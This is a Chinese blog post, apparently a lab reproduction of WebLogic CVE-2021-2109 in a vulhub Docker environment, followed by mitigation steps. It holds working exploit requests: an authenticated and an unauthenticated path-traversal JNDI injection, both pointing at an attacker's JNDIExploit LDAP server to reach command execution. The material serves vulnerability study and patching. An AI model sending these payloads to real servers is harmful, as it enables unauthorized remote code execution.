前往小程序,Get更优阅读体验!
立即前往
发布
社区首页 >专栏 >Weblogic-CVE-2021-2109

Weblogic-CVE-2021-2109

作者头像
Naraku
发布2021-07-29 11:27:00
发布2021-07-29 11:27:00
70700
代码可运行
举报
文章被收录于专栏:Naraku的专栏Naraku的专栏
运行总次数:0
代码可运行

影响版本

  • WebLogic 10.3.6.0.0
  • WebLogic 12.1.3.0.0
  • WebLogic 12.2.1.3.0
  • WebLogic 12.2.1.4.0
  • WebLogic 14.1.1.0.0

环境准备

代码语言:javascript
代码运行次数:0
复制
$ cd vulhub/weblogic/CVE-2020-14882/
$ docker-compose up -d
  • 访问看到这个404页面说明部署成功

漏洞复现

  • 先在攻击机上使用JNDIExploit启动LDAP,此时会同时开启LDAP和HTTP服务
代码语言:javascript
代码运行次数:0
复制
$ java -jar JNDIExploit.jar -i <VPS_IP>

授权访问后台JNDI注入

  • 使用浏览器访问控制台:http://<IP:PORT>/console/login/LoginForm.jsp进行登录。默认账号为weblogic,密码可在靶机使用以下命令查询:
代码语言:javascript
代码运行次数:0
复制
$ docker-compose logs | grep password
  • 登录后访问:http://<IP:PORT>/console/console.portal可进入控制台。使用Burp抓包,发送到Repeater
  • Repeater中修改请求为以下Payload,需要注意的是,服务器IP格式为xxx.xxx.xxx;xxx,最后一段是以分号;分割的
代码语言:javascript
代码运行次数:0
复制
POST /console/consolejndi.portal?_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle(%22ldap://xxx.xxx.xxx;xxx:1389/Basic/WeblogicEcho;AdminServer%22) HTTP/1.1
  • 尝试执行CMD命令

未授权访问后台JNDI注入

  • 和前面差不多,只不过此处访问的是http://<IP:PORT>/console/css/%252e%252e%252f/consolejndi.portal
  • 然后使用Burp抓包并发送到Repeater,同样需要注意服务器IP格式为xxx.xxx.xxx;xxx,Payload如下
代码语言:javascript
代码运行次数:0
复制
POST /console/css/%25%32%65%25%32%65%25%32%66/consolejndi.portal?_pageLabel=JNDIBindingPageGeneral&_nfpb=true&cqqhandle=com.bea.console.handles.JndiBindingHandle(%22ldap://xxx.xxx.xxx;xxx:1389/Basic/WeblogicEcho;AdminServer%22) HTTP/1.1
  • 这里直接执行命令吧

修复方案

  1. 禁用T3协议:如果您不依赖T3协议进行JVM通信,可通过暂时阻断T3协议缓解此漏洞带来的影响
    • 进入Weblogic控制台,在base_domain配置页面中,进入“安全”选项卡页面,点击“筛选器”,配置筛选器。
    • 在连接筛选器中输入:weblogic.security.net.ConnectionFilterImpl,在连接筛选器规则框中输入:* * 7001 deny t3 t3s
  2. 禁止启用IIOP:登陆Weblogic控制台,找到启用IIOP选项,取消勾选,重启生效
  3. 临时关闭后台/console/console.portal对外访问
  4. 升级官方安全补
本文参与 腾讯云自媒体同步曝光计划,分享自作者个人站点/博客。
原始发表:2021 年 01 月,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 作者个人站点/博客 前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  • 影响版本
  • 环境准备
  • 漏洞复现
    • 授权访问后台JNDI注入
    • 未授权访问后台JNDI注入
  • 修复方案
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档